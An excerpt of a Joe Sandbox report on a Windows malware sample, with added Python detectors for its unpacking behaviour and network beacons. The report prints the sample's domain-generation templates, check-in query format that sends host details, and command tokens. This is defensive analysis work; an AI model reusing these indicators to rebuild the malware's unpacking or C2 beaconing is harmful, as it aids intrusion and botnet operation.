                                                                                            • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                                            • Instruction Fuzzy Hash: 1C313C71A003456FDF118BB99E88AAF7F78EF49344B10803AFA46F72C1D6748940C768
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
                                                                                            • GetLastError.KERNEL32(?,?,?,?,0040238C,00000000), ref: 00402298
                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,0040238C,00000000), ref: 00402336
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                                            • String ID: (
                                                                                            • API String ID: 2871813557-3887548279
                                                                                            • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                                            • Instruction ID: fa8a78d08e5b147245ce613c51b7eec45b3ed4bb95c194ee9eab5a02c05580c9
                                                                                            • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                                            • Instruction Fuzzy Hash: DE516375A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B5EA51CB94
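Three of the process 5 (crtgame) listings above form the chain an analyst checks when a report says "Detected unpacking": a service entry point that registers a control handler for a service named SpaceXRaces, a routine that locates an RT_RCDATA resource (FindResourceA type 0000000A), loads and locks it and allocates a GlobalAlloc buffer, and a routine that commits a PAGE_EXECUTE_READWRITE region (VirtualAlloc with 00003000 = MEM_COMMIT|MEM_RESERVE, 00000040 = PAGE_EXECUTE_READWRITE) before resolving imports through LoadLibraryExA and GetProcAddress. The script below is an added example and is not part of the Joe Sandbox report or of the sample's own code: it parses API lines in the exact text form printed on this page and flags those behaviours. The sample trace is a constructed subset copied from the listings above. It assumes that only the leading positional arguments of a line are the call's real parameters (Joe Sandbox prints further stack values after them); the function and finding names (`triage`, `hexarg`, `rwx_alloc_sites` and so on) are introduced here and are not Joe Sandbox identifiers.

```python
import re
from dataclasses import dataclass

# Documented Win32 constants behind the values printed in the listing
# (00003000 on the VirtualAlloc line is MEM_COMMIT | MEM_RESERVE).
PAGE_EXECUTE_READWRITE = 0x40   # flProtect 00000040
RT_RCDATA = 10                  # FindResource type 0000000A

# Constructed sample: a subset of the process 5 API lines on this page, in the
# exact text form Joe Sandbox prints them.
SAMPLE_TRACE = """
• RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
• SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
• FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
• LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
• LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
• GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
• LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
• GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
• GetLastError.KERNEL32 ref: 00402298
• VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
"""

# Matches "• Api.MODULE(arg,arg,...), ref: ADDR" and "• Api.MODULE ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: list   # argument strings as printed; "?" means the sandbox did not recover it
    ref: int     # call-site address

def parse_trace(text):
    """Parse Joe Sandbox API lines; lines that do not match the format are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls

def hexarg(call, i):
    """Argument i as an int, or None if it is missing, unrecovered ("?") or not hex."""
    if i >= len(call.args) or not re.fullmatch(r"[0-9A-Fa-f]{8}", call.args[i]):
        return None
    return int(call.args[i], 16)

def service_name(calls):
    """Service name passed to RegisterServiceCtrlHandlerA/W, if the trace registers one."""
    for c in calls:
        if c.api in ("RegisterServiceCtrlHandlerA", "RegisterServiceCtrlHandlerW") and c.args:
            return c.args[0]
    return None

def rwx_alloc_sites(calls):
    """VirtualAlloc call sites whose 4th real parameter (flProtect) is RWX."""
    return [f"{c.ref:08X}" for c in calls
            if c.api == "VirtualAlloc" and hexarg(c, 3) == PAGE_EXECUTE_READWRITE]

def stages_rcdata_payload(calls):
    """True if an RT_RCDATA resource is located, loaded and then locked, in that order."""
    state = 0
    for c in calls:
        if state == 0 and c.api in ("FindResourceA", "FindResourceW") and hexarg(c, 1) == RT_RCDATA:
            state = 1
        elif state == 1 and c.api == "LoadResource":
            state = 2
        elif state == 2 and c.api == "LockResource":
            return True
    return False

def resolves_imports_at_runtime(calls):
    """True if GetProcAddress follows a LoadLibrary* call (import table rebuilt by hand)."""
    loaded = False
    for c in calls:
        if c.api.startswith("LoadLibrary"):
            loaded = True
        elif loaded and c.api == "GetProcAddress":
            return True
    return False

def triage(text):
    """Summarise the persistence and unpacking indicators found in one trace."""
    calls = parse_trace(text)
    return {
        "service_name": service_name(calls),
        "rwx_alloc_sites": rwx_alloc_sites(calls),
        "rcdata_payload": stages_rcdata_payload(calls),
        "dynamic_imports": resolves_imports_at_runtime(calls),
    }
```

On the constructed trace `triage(SAMPLE_TRACE)` reports the service name SpaceXRaces, one RWX allocation at 004021E3 (the second VirtualAlloc, with flProtect 00000004 = PAGE_READWRITE, is correctly left out), a staged RT_RCDATA payload, and run-time import resolution. The last indicator is weak on its own: the MSVCRT runtime-error path in the listing above also does LoadLibraryA("user32.dll") followed by GetProcAddress for MessageBoxA, so treat it as corroborating evidence next to the RWX allocation and the resource staging rather than as a finding by itself.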
                                                                                            APIs
                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032F0), ref: 00403B79
                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032F0), ref: 00403BB7
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032F0), ref: 00403C78
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032F0), ref: 00403C8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                            • String ID: @q@$@q@
                                                                                            • API String ID: 714016831-1591251108
                                                                                            • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                                            • Instruction ID: 6b7d5d1079877a4fdc04a989ad5d4427692f66b21ec07018b92eff91f37320a0
                                                                                            • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                                            • Instruction Fuzzy Hash: 47311071A447019BE3308F28DD49B22BBA8E74475AF00423BE155FB3D1E778B9008B0D
APIs
• GetVersionExA.KERNEL32 ref: 00403181
• GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031B6
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403216
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: EnvironmentFileModuleNameVariableVersion
• String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
• API String ID: 1385375860-4131005785
• Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
• Instruction ID: 0bfe33c8882bc5da799f901860b26a8a70e2baa25249e611fba62494fac00854
• Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
• Instruction Fuzzy Hash: FA3124719052846EEB319A705C55BDA3F6C9B0730AF2404FFD085F92C2E63D8F8A8B19
APIs
• GetStartupInfoA.KERNEL32(?), ref: 004048EB
• GetFileType.KERNEL32(00000800), ref: 00404991
• GetStdHandle.KERNEL32(-000000F6), ref: 004049EA
• GetFileType.KERNEL32(00000000), ref: 004049F8
• SetHandleCount.KERNEL32 ref: 00404A2F
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
• Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
• Instruction ID: 4e5b6c2e9b57b0b0783508239f10a0ad73356ae994103a46a91c1c9ef3db655a
• Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
• Instruction Fuzzy Hash: EF5124F16043608BD7208B38CD447673BA0BB81324F1A473AE6E6FB2E1D73C8855875A
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
• LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
• WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,N@ ,?,00000000,00000000,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D7C
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID: N@
• API String ID: 352835431-2588724849
• Opcode ID: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
• Instruction ID: 20da4dc5c4367d057857615b5720e39787682ab55b18fc8d36651601e05c1bdf
• Opcode Fuzzy Hash: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
• Instruction Fuzzy Hash: 1C11D432900609ABDF228F94CD44ADFBBB6EB48750F148166FE16721A0D3368D61DF64
APIs
• VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403D9C,@q@,7591DFF0,?,00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CAB
• HeapFree.KERNEL32(00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CE1
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Free$HeapVirtual
• String ID: @q@$@q@
• API String ID: 3783212868-1591251108
• Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
• Instruction ID: f6895fdbbb123314fbd550313b942ac7b83e67952c1407439619f49545067eb6
• Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
• Instruction Fuzzy Hash: 88F03431A04210DFD3249F28EE09A427BF4FB08710B014A2AE4A6AB3E1C731AC40CF48
APIs
• GetCPInfo.KERNEL32(?,00000000), ref: 0040571A
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
• Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
• Instruction ID: f7edae9c6ae74023553f5d2ec798d7d3c7047796f49532e24c337197b6512109
• Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
• Instruction Fuzzy Hash: 494154320007A85EEB15A724DD49BFB3FA9DB06704F1400F6D946FB192C27949289FAF
APIs
• HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 004039D4
• HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A08
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A22
• HeapFree.KERNEL32(00000000,?,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A39
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: AllocHeap$FreeVirtual
• String ID:
• API String ID: 3499195154-0
• Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
• Instruction ID: 429f96408e1d6026f999a6daa987e4c74961ce2be0a7022420d0a9926faab586
• Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
• Instruction Fuzzy Hash: E4116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E71B0D7729961CF09

Execution Graph

Execution Coverage: 11.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0.6%
Total number of Nodes: 351
Total number of Limit Nodes: 22
APIs
• RtlInitializeCriticalSection.NTDLL(02A673D8), ref: 02A35F43
• GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02A35F5A
• GetProcAddress.KERNEL32(00000000), ref: 02A35F63
• GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02A35F72
• GetProcAddress.KERNEL32(00000000), ref: 02A35F75
  • Part of subcall function 02A3F1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02A3F235
  • Part of subcall function 02A3F1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02A3F256
  • Part of subcall function 02A3F1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02A3F26A
  • Part of subcall function 02A3F1E7: CloseHandle.KERNEL32(00000000), ref: 02A3F273
• GetTickCount.KERNEL32 ref: 02A35FB6
• GetVersionExA.KERNEL32(02A67030), ref: 02A35FE3
• _memset.LIBCMT ref: 02A36000
• _malloc.LIBCMT ref: 02A3600D
• _malloc.LIBCMT ref: 02A3601D
                                                                                            • _malloc.LIBCMT ref: 02A3602B
                                                                                            • _malloc.LIBCMT ref: 02A36036
                                                                                            • _malloc.LIBCMT ref: 02A36041
                                                                                            • _malloc.LIBCMT ref: 02A3604C
                                                                                            • _malloc.LIBCMT ref: 02A36057
                                                                                            • _malloc.LIBCMT ref: 02A36066
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02A3607D
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A36086
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A36095
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A36098
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A360A3
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A360A6
                                                                                            • _memset.LIBCMT ref: 02A360B9
                                                                                            • _memset.LIBCMT ref: 02A360C5
                                                                                            • _memset.LIBCMT ref: 02A360D2
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A360E0
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A360ED
                                                                                            • _malloc.LIBCMT ref: 02A36111
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • _malloc.LIBCMT ref: 02A3611F
                                                                                            • _malloc.LIBCMT ref: 02A36126
                                                                                            • _malloc.LIBCMT ref: 02A3614A
                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02A3615A
                                                                                            • Sleep.KERNELBASE ref: 02A36168
                                                                                            • _malloc.LIBCMT ref: 02A36174
                                                                                            • _malloc.LIBCMT ref: 02A36181
                                                                                            • _memset.LIBCMT ref: 02A36196
                                                                                            • _memset.LIBCMT ref: 02A361A6
                                                                                            • Sleep.KERNELBASE(00001388), ref: 02A361C2
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A361CD
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A361DE
                                                                                            • _memset.LIBCMT ref: 02A36233
                                                                                            • _memset.LIBCMT ref: 02A36242
                                                                                            • GetTickCount.KERNEL32 ref: 02A362E5
                                                                                            • _memset.LIBCMT ref: 02A3630F
                                                                                            • wsprintfA.USER32 ref: 02A36C3B
                                                                                            • _memset.LIBCMT ref: 02A36C5C
                                                                                            • _memset.LIBCMT ref: 02A36C6C
                                                                                            • _memset.LIBCMT ref: 02A36C9B
                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A36D3D
                                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02A36D65
                                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02A36D7D
                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02A36D95
                                                                                            • _memset.LIBCMT ref: 02A36DA5
                                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02A36DBE
                                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02A36DDD
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02A36DF7
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02A36E02
                                                                                            • _memset.LIBCMT ref: 02A36E4D
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A36E72
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A36E83
                                                                                            • _malloc.LIBCMT ref: 02A36F0A
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A36F1C
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A36F28
                                                                                            • _memset.LIBCMT ref: 02A36F42
                                                                                            • _memset.LIBCMT ref: 02A36F51
                                                                                            • _memset.LIBCMT ref: 02A36F61
                                                                                            • _memset.LIBCMT ref: 02A36F70
                                                                                            • _memset.LIBCMT ref: 02A36F82
                                                                                            • _malloc.LIBCMT ref: 02A36FFC
                                                                                            • _memset.LIBCMT ref: 02A3700D
                                                                                            • _strtok.LIBCMT ref: 02A3702D
                                                                                            • _swscanf.LIBCMT ref: 02A37044
                                                                                            • _strtok.LIBCMT ref: 02A3705B
                                                                                            • Sleep.KERNEL32(000007D0), ref: 02A37162
                                                                                            • _memset.LIBCMT ref: 02A371D6
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A371E3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A371F5
                                                                                            • _sprintf.LIBCMT ref: 02A3728A
                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02A3734E
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A37382
                                                                                              • Part of subcall function 02A35D1D: _malloc.LIBCMT ref: 02A35D2B
                                                                                            • _malloc.LIBCMT ref: 02A37583
                                                                                            • _memset.LIBCMT ref: 02A3758F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                                            • String ID: $%d;$/click/?counter=$<htm$Host: %s$J&D$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                                            • API String ID: 2018021302-2135968042
                                                                                            • Opcode ID: 5455b0c031f953a33eea0ef84d7ca959b3c79d97b7056796319f804f6063bf72
                                                                                            • Instruction ID: 36e5f8ced3f0f3ba0306aea9b29cc6ddef598dd744b3a8fcc274605e3a096594
                                                                                            • Opcode Fuzzy Hash: 5455b0c031f953a33eea0ef84d7ca959b3c79d97b7056796319f804f6063bf72
                                                                                            • Instruction Fuzzy Hash: 0DD2C7B26587A06ED3119B6C9C81B7FFBECAB8D704F59052DF5D4C6142CE28C606CB92
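
The function above assembles the bot's check-in: it formats a candidate domain from one of the 26 `<letter>%c%c%c%c%c%c.<tld>` templates, fetches `/click/?counter=` over WinINet with the fixed User-Agent `Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)` (there is no Windows NT 9.0, so the string is a reliable static indicator), sets send and receive timeouts of 0x1388 = 5000 ms via `InternetSetOptionA` options 5 and 6, passes `InternetOpenUrlA` flags 0x04000200 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI (so the response leaves no WinINet cache entry), and reports `client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d`. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it turns those strings into a detector for proxy logs. The six `%c` characters are not recoverable from the report, so any six non-dot characters are accepted in that position (an assumption), and the log lines it scans are constructed.

```python
"""Network indicators from the Socks5Systemz strings above.

Added example, not part of the Joe Sandbox report. Everything here is
transcribed from the String ID list of the function above: the 26 DGA
templates "<letter>%c%c%c%c%c%c.<tld>", the "/click/?counter=" path, the
beacon query string and the hard-coded User-Agent. The six %c characters
cannot be recovered from the report, so the matcher accepts any six
non-dot characters in that position (assumption). The log lines are
constructed for the demonstration.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# First letter -> TLD, exactly as the 26 format strings pair them
# (note that i and j both map to .info; it is not a clean ru/com/net/info/ua rotation).
DGA_TLD_BY_PREFIX = {
    "a": "ru", "b": "com", "c": "net", "d": "info", "e": "ua",
    "f": "ru", "g": "com", "h": "net", "i": "info", "j": "info",
    "k": "ua", "l": "ru", "m": "com", "n": "net", "o": "info",
    "p": "ua", "q": "ru", "r": "com", "s": "net", "t": "info",
    "u": "ua", "v": "ru", "w": "com", "x": "net", "y": "info", "z": "ua",
}
# "Windows NT 9.0" never shipped, so this exact UA is a reliable static indicator.
SOCKS5SYSTEMZ_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
# Keys of "client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d".
BEACON_KEYS = ("client_id", "connected", "server_port", "debug", "os", "dgt", "dti")

_DGA_RE = re.compile(r"^([a-z])([^.]{6})\.([a-z]+)$")


def is_dga_domain(name: str) -> bool:
    """True if name is <letter><6 chars>.<tld> and the TLD is the one the template assigns to that letter."""
    m = _DGA_RE.match(name.lower().rstrip("."))
    return bool(m) and DGA_TLD_BY_PREFIX[m.group(1)] == m.group(3)


def parse_beacon(url: str) -> Optional[dict]:
    """Decode the check-in query string; None if the URL does not carry all seven fields."""
    q = parse_qs(urlsplit(url).query)
    if not all(k in q for k in BEACON_KEYS):
        return None
    cid = q["client_id"][0]
    if not re.fullmatch(r"[0-9a-f]{8}", cid):  # %.8x -> exactly eight lowercase hex digits
        return None
    try:
        return {
            "client_id": cid,
            "connected": int(q["connected"][0]),
            "server_port": int(q["server_port"][0]),
            "debug": int(q["debug"][0]),
            "os": q["os"][0],  # "%d.%d.%04d" -> major.minor.build from GetVersionExA
            "dgt": int(q["dgt"][0]),
            "dti": int(q["dti"][0]),
        }
    except ValueError:
        return None


def scan_proxy_line(line: str) -> list:
    """Tag one tab-separated proxy record: timestamp, client, method, url, user_agent."""
    _ts, _client, _method, url, ua = line.rstrip("\n").split("\t")
    parts = urlsplit(url)
    tags = []
    if is_dga_domain(parts.hostname or ""):
        tags.append("dga_domain")
    if ua == SOCKS5SYSTEMZ_UA:
        tags.append("socks5systemz_ua")
    if parts.path == "/click/" and "counter" in parse_qs(parts.query):
        tags.append("click_counter")
    if parse_beacon(url) is not None:
        tags.append("beacon")
    return tags


# Constructed proxy log: one benign request, one /click/ fetch, one check-in.
SAMPLE_LOG_LINES = [
    "2024-12-15T10:00:01Z\t10.0.0.7\tGET\thttp://www.example.com/index.html\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "2024-12-15T10:00:02Z\t10.0.0.7\tGET\thttp://bhmqpxk.com/click/?counter=1\t" + SOCKS5SYSTEMZ_UA,
    "2024-12-15T10:00:03Z\t10.0.0.7\tGET\thttp://qtrvoge.ru/?client_id=1a2b3c4d&connected=1"
    "&server_port=1080&debug=0&os=10.0.19045&dgt=0&dti=0\t" + SOCKS5SYSTEMZ_UA,
]


def scan_sample_log() -> list:
    return [scan_proxy_line(line) for line in SAMPLE_LOG_LINES]


if __name__ == "__main__":
    for line, tags in zip(SAMPLE_LOG_LINES, scan_sample_log()):
        print(tags or ["-"], line.split("\t")[3])
```

A seven-character label with the matching TLD is a weak signal on its own (legitimate domains of that shape exist), so alert on it only together with the User-Agent or the beacon query string. The same String ID list carries the words `connect`, `disconnect`, `idle`, `block`, `updips`, `updurls`, `urls`, `auth_ip` and `auth_swith`, next to the `_strtok`/`_swscanf` calls that parse the response; those are the tokens to look for when carving a captured reply.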

                                                                                             Control-flow Graph

